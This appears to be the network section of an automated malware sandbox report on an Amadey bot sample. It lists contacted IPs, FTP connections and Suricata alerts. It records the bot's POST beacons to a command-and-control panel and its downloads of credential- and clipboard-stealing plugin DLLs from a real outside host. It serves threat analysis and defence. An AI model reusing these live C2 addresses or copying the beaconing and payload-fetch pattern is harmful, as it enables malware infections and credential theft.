Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 110.42.3.95 | Active | Moloch |
| 116.202.81.93 | Active | Moloch |
| 118.25.101.87 | Active | Moloch |
| 119.176.96.94 | Active | Moloch |
| 125.229.77.252 | Active | Moloch |
| 146.148.25.153 | Active | Moloch |
| 155.159.241.238 | Active | Moloch |
| 157.97.109.159 | Active | Moloch |
| 162.0.211.158 | Active | Moloch |
| 162.240.68.86 | Active | Moloch |
| 178.17.168.102 | Active | Moloch |
| 182.92.155.50 | Active | Moloch |
| 184.154.46.96 | Active | Moloch |
| 80.66.75.214 | Active | Moloch |
| 197.234.223.180 | Active | Moloch |
| 213.100.160.101 | Active | Moloch |
| 213.199.32.146 | Active | Moloch |
| 34.43.67.154 | Active | Moloch |
| 37.16.7.184 | Active | Moloch |
| 38.249.14.69 | Active | Moloch |
| 38.249.8.144 | Active | Moloch |
| 47.99.144.17 | Active | Moloch |
| 63.134.234.92 | Active | Moloch |
| 68.183.179.133 | Active | Moloch |
| 77.246.158.216 | Active | Moloch |
| 79.124.17.242 | Active | Moloch |
| 79.96.222.94 | Active | Moloch |
| 83.243.47.17 | Active | Moloch |
| 87.230.85.251 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
- TCP Requests
-
-
116.202.81.93:21 192.168.56.103:57877
-
118.25.101.87:21 192.168.56.103:57924
-
118.25.101.87:2121 192.168.56.103:57956
-
119.176.96.94:21 192.168.56.103:57960
-
125.229.77.252:21 192.168.56.103:57848
-
146.148.25.153:21 192.168.56.103:57345
-
162.0.211.158:21 192.168.56.103:57855
-
162.240.68.86:21 192.168.56.103:57593
-
178.17.168.102:21 192.168.56.103:57551
-
182.92.155.50:21 192.168.56.103:57957
-
184.154.46.96:21 192.168.56.103:57365
-
192.168.56.103:49165 80.66.75.214:80
-
192.168.56.103:49166 80.66.75.214:80
-
192.168.56.103:49172 80.66.75.214:80
-
192.168.56.103:49175 80.66.75.214:80
-
197.234.223.180:21 192.168.56.103:57846
-
213.100.160.101:21 192.168.56.103:57775
-
213.199.32.146:21 192.168.56.103:57871
-
68.183.179.133:21 192.168.56.103:57369
-
77.246.158.216:21 192.168.56.103:57894
-
79.124.17.242:21 192.168.56.103:57869
-
83.243.47.17:21 192.168.56.103:57886
-
87.230.85.251:21 192.168.56.103:57874
-
POST
200
http://80.66.75.214/g8djmsaxA/index.php
REQUEST
RESPONSE
BODY
POST /g8djmsaxA/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 80.66.75.214
Content-Length: 4
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://80.66.75.214/g8djmsaxA/index.php?scr=1
REQUEST
RESPONSE
BODY
POST /g8djmsaxA/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODcwMTk=
Host: 80.66.75.214
Content-Length: 87171
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://80.66.75.214/g8djmsaxA/index.php
REQUEST
RESPONSE
BODY
POST /g8djmsaxA/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 80.66.75.214
Content-Length: 160
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://80.66.75.214/g8djmsaxA/Plugins/cred64.dll
REQUEST
RESPONSE
BODY
GET /g8djmsaxA/Plugins/cred64.dll HTTP/1.1
Host: 80.66.75.214
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:34 GMT
Content-Type: application/octet-stream
Content-Length: 1257472
Last-Modified: Mon, 11 Dec 2023 09:14:12 GMT
Connection: keep-alive
ETag: "6576d2e4-133000"
Accept-Ranges: bytes
POST
200
http://80.66.75.214/g8djmsaxA/index.php
REQUEST
RESPONSE
BODY
POST /g8djmsaxA/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 80.66.75.214
Content-Length: 21
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
GET
200
http://80.66.75.214/g8djmsaxA/Plugins/clip64.dll
REQUEST
RESPONSE
BODY
GET /g8djmsaxA/Plugins/clip64.dll HTTP/1.1
Host: 80.66.75.214
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:47 GMT
Content-Type: application/octet-stream
Content-Length: 104448
Last-Modified: Mon, 11 Dec 2023 09:14:14 GMT
Connection: keep-alive
ETag: "6576d2e6-19800"
Accept-Ranges: bytes
POST
200
http://80.66.75.214/g8djmsaxA/index.php
REQUEST
RESPONSE
BODY
POST /g8djmsaxA/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 80.66.75.214
Content-Length: 5
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 155.159.241.238:21 -> 192.168.56.103:57971 | 2400024 | ET DROP Spamhaus DROP Listed Traffic Inbound group 25 | Misc Attack |
| TCP 192.168.56.103:49166 -> 80.66.75.214:80 | 2044597 | ET MALWARE Amadey Bot Activity (POST) M1 | A Network Trojan was detected |
| TCP 192.168.56.103:49166 -> 80.66.75.214:80 | 2027250 | ET INFO Dotted Quad Host DLL Request | Potentially Bad Traffic |
| TCP 80.66.75.214:80 -> 192.168.56.103:49166 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 80.66.75.214:80 -> 192.168.56.103:49166 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
| TCP 192.168.56.103:49166 -> 80.66.75.214:80 | 2027250 | ET INFO Dotted Quad Host DLL Request | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts